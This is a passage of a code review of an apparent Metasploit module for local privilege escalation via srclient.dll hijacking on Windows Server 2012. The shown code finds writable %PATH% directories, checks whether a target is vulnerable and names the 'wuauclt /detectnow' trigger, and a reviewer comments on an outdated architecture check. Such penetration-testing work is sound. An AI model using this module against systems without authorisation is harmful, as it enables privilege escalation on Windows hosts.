modules/exploits/windows/local/srclient_dll_hijacking.rb

```diff
@@ -0,0 +1,329 @@
+          writable_path_dirs << pdir unless writable_path_dirs.include?(pdir)
+          next
+        end
+
+        # ignore groups that don't match the groups for the current user, or the required permissions
+        next unless user_groups.any? { |ug| group.downcase == ug.downcase }
+        next unless perms_we_need.any? { |prm| perms.downcase.include? prm.downcase }
+
+        # if we are here, we found a %PATH% directory we can write to!!!
+        writable_path_dirs << pdir unless writable_path_dirs.include?(pdir)
+      end
+    end
+
+    vprint_status('')
+
+    writable_path_dirs
+  end
+
+  def exploitation_message(trigger_cmd)
+    if trigger_cmd == 'wuauclt /detectnow'
+      print_status("Trying to trigger the payload in the background via the shell command `#{trigger_cmd}`")
+    else
+      print_status("Trying to trigger the payload via the shell command `#{trigger_cmd}`")
+    end
+  end
+
+  def check
+    # check OS
+    unless sysinfo['OS'].include?('2012')
+      return Exploit::CheckCode::Safe('Target is not Windows Server 2012.')
+    end
+
+    if sysinfo['OS'].include?('R2')
+      return Exploit::CheckCode::Safe('Target is Windows Server 2012 R2, but only Windows Server 2012 is vulnerable.')
+    end
+
+    print_status("Target is #{sysinfo['OS']}")
+
+    # get groups for the current user, this is necessary to verify write permissions
+    current_user = session.sys.config.getuid
+    user_groups = grab_user_groups(current_user)
+
+    # get %PATH% dirs and check if the current user can write to them
+    print_status('Checking for writable directories in %PATH%...')
+    path_dirs = get_envs('PATH')
+
+    if path_dirs.blank? || path_dirs['PATH'].blank?
+      get_path_fail_message = 'Failed to obtain %PATH% directories.'
+      unless provided_path_dir.blank?
+        get_path_fail_message << force_exploit_message
+      end
+      return Exploit::CheckCode::Unknown(get_path_fail_message)
+    end
+
+    @writable_path_dirs = enumerate_writable_path_dirs(path_dirs, user_groups, current_user)
+
+    writable_path_dirs_fail_message = "#{current_user} does not seem to have write permissions to any of the %PATH% directories"
+
+    if @writable_path_dirs.empty?
+      unless provided_path_dir.blank?
+        writable_path_dirs_fail_message << force_exploit_message
+      end
+      return Exploit::CheckCode::Safe(writable_path_dirs_fail_message)
+    end
+
+    if provided_path_dir.blank?
+      print_good("#{current_user} has write permissions to the following %PATH% directories:")
+      print_status('')
+      @writable_path_dirs.each { |wpd| print_status("\t#{wpd}") }
+      print_status('')
+    else
+      print_good("#{current_user} has write permissions to #{provided_path_dir}")
+    end
+
+    return Exploit::CheckCode::Appears
+  end
+
+  def exploit
+    if is_system?
+      fail_with(Failure::None, 'Session is already elevated')
+    end
+
+    if sysinfo['Architecture'] =~ /wow64/i
```

Comment:
`wow64` is no longer a valid arch value.  You're already doing the check for payload arch vs target arch, which is how we check for a wow64 environment, now.